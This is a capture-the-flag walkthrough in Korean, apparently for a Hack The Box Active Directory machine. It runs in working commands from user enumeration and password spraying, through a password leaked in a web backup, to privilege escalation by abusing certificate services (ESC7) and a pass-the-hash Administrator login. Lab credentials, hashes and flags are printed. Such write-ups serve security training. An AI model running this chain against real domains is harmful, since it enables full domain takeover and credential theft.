Proof of Concept
10.129.16.11
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49695/tcp open unknown
49726/tcp open unknown
49735/tcp open unknown
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldapInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Manager]
└─$ nxc smb 10.129.16.11 --generate-hosts-file hosts
SMB 10.129.16.11 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Manager]
└─$ cat hosts
10.129.16.11 DC01.manager.htb manager.htb DC01/etc/hosts 파일 적용
┌──(kali㉿kali)-[~/Manager]
└─$ cat /etc/hosts
<SNIP>
10.129.16.11 DC01.manager.htb manager.htb DC01Windows 사용자 열거
┌──(kali㉿kali)-[~/Manager]
└─$ impacket-lookupsid manager.htb/guest@10.129.16.11 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.16.11
[*] StringBinding ncacn_np:10.129.16.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
<SNIP>
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)Active Directory 사용자 열거
┌──(kali㉿kali)-[~/Manager]
└─$ ./kerbrute userenum /usr/share/seclists/Usernames/cirt-default-usernames.txt --dc dc01.manager.htb -d manager.htb -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/07/26 - Ronnie Flathers @ropnop
2026/02/07 11:32:50 > Using KDC(s):
2026/02/07 11:32:50 > dc01.manager.htb:88
2026/02/07 11:32:50 > [+] VALID USERNAME: ADMINISTRATOR@manager.htb
2026/02/07 11:32:50 > [+] VALID USERNAME: Administrator@manager.htb
2026/02/07 11:32:50 > [+] VALID USERNAME: Guest@manager.htb
2026/02/07 11:32:50 > [+] VALID USERNAME: GUEST@manager.htb
2026/02/07 11:32:51 > [+] VALID USERNAME: OPERATOR@manager.htb
2026/02/07 11:32:51 > [+] VALID USERNAME: Operator@manager.htb
2026/02/07 11:32:51 > [+] VALID USERNAME: administrator@manager.htb
2026/02/07 11:32:52 > [+] VALID USERNAME: guest@manager.htb
2026/02/07 11:32:52 > [+] VALID USERNAME: operator@manager.htb
2026/02/07 11:32:52 > Done! Tested 828 usernames (9 valid) in 2.531 secondsInitial Access
사용자명과 비밀번호가 동일한 계정 탐색
- operator:operator SMB 인증 성공
┌──(kali㉿kali)-[~/Manager]
└─$ nxc smb manager.htb -u users.txt -p users.txt -t 100 --continue-on-success --no-bruteforce
SMB 10.129.16.11 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.16.11 445 DC01 [-] manager.htb\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [+] manager.htb\DnsAdmins:DnsAdmins (Guest)
SMB 10.129.16.11 445 DC01 [+] manager.htb\DnsUpdateProxy:DnsUpdateProxy (Guest)
SMB 10.129.16.11 445 DC01 [+] manager.htb\SQLServer2005SQLBrowserUser$DC01:SQLServer2005SQLBrowserUser$DC01 (Guest)
SMB 10.129.16.11 445 DC01 [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\Cheng:Cheng STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\Ryan:Ryan STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\Raven:Raven STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\JinWoo:JinWoo STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\ChinHae:ChinHae STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [+] manager.htb\operator:operatoroperator 계정으로 mssql 인증 성공
┌──(kali㉿kali)-[~/Manager]
└─$ nxc mssql manager.htb -u operator -p operator
MSSQL 10.129.16.11 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.16.11 1433 DC01 [+] manager.htb\operator:operatormssql 접속
┌──(kali㉿kali)-[~/Manager]
└─$ impacket-mssqlclient manager.htb/operator:operator@manager.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>파일 탐색
- C:\inetpub\wwwroot 디렉토리에서 web.config, website-backup-27-07-23-old.zip 파일 발견
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1website-backup-27-07-23-old.zip 다운로드
┌──(kali㉿kali)-[~/Manager]
└─$ wget http://manager.htb/website-backup-27-07-23-old.zip
--2026-02-07 11:55:26-- http://manager.htb/website-backup-27-07-23-old.zip
Resolving manager.htb (manager.htb)... 10.129.16.11
Connecting to manager.htb (manager.htb)|10.129.16.11|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.zip 100%[==========================================================================================>] 1021K 284KB/s in 3.6s
2026-02-07 11:55:30 (284 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]압축 해제
┌──(kali㉿kali)-[~/Manager/backup]
└─$ unzip website-backup-27-07-23-old.zip
Archive: website-backup-27-07-23-old.zip
inflating: .old-conf.xml
inflating: about.html
inflating: contact.html
inflating: css/bootstrap.css
inflating: css/responsive.css
inflating: css/style.css
inflating: css/style.css.map
inflating: css/style.scss
inflating: images/about-img.png
inflating: images/body_bg.jpg
extracting: images/call.png
extracting: images/call-o.png
<SNIP.old-conf.xml 파일에서 raven 계정 정보 발견
- raven:R4v3nBe5tD3veloP3r!123
┌──(kali㉿kali)-[~/Manager/backup]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>raven 계정으로 WinRM 접속
┌──(kali㉿kali)-[~/Manager/backup]
└─$ evil-winrm -i manager.htb -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
4ea57750094b540eb832bc54efa99196
*Evil-WinRM* PS C:\Users\Raven\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.16.11
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1Privilege Escalation
ceritpy를 사용하여 취약점 스캔
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.16.11 -target-ip 10.129.16.11 -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260207120513_Certipy.txt'
[*] Wrote text output to '20260207120513_Certipy.txt'
[*] Saving JSON output to '20260207120513_Certipy.json'
[*] Wrote JSON output to '20260207120513_Certipy.json'ESC7 취약점 발견
┌──(kali㉿kali)-[~/Manager]
└─$ cat 20260207120513_Certipy.txt
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[+] User Enrollable Principals : MANAGER.HTB\Raven
MANAGER.HTB\Authenticated Users
[+] User ACL Principals : MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : User has dangerous permissions.
Certificate Templates : [!] Could not find any certificate templatesRaven 계정에 Certificate Officer 역할 추가
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.129.16.11' -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -add-officer 'raven'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'CA에서 SubCA 템플릿을 활성화하여 사용 가능하게 설정
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.129.16.11' -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -enable-template 'SubCA'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'Administrator 계정으로 SubCA 템플릿 인증서를 요청하여 Request ID 22와 private key 생성
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.16.11 -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -template 'SubCA' -upn 'administrator@manager.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 22
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '22.key'
[*] Wrote private key to '22.key'
[-] Failed to request certificateRaven의 ManageCa 및 Officer 권한을 이용해 대기 중인 Request ID 22를 강제로 승인
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns 10.129.16.11 -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -issue-request '22' -dc-ip 10.129.16.11
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate request ID 22승인된 Request ID 22의 인증서와 private key와 사용하여 administrator.pfx 파일 생성
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip '10.129.16.11' -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -retrieve '22'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Retrieving certificate with ID 22
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Loaded private key from '22.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'PFX 인증서를 이용해 Kerberos TGT를 획득하고 Administrator의 NT 해시를 덤프
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip '10.129.16.11'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@manager.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Security Extension SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef추출한 NT 해시로 WinRM을 통해 Administrator로 로그인 성공
┌──(kali㉿kali)-[~/Manager]
└─$ evil-winrm -i 10.129.16.11 -u 'administrator' -H 'ae5064c2f62317332c88629e025924ef'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
686b06aa26f1a32abdd7f04c0a876e31
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.16.11
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1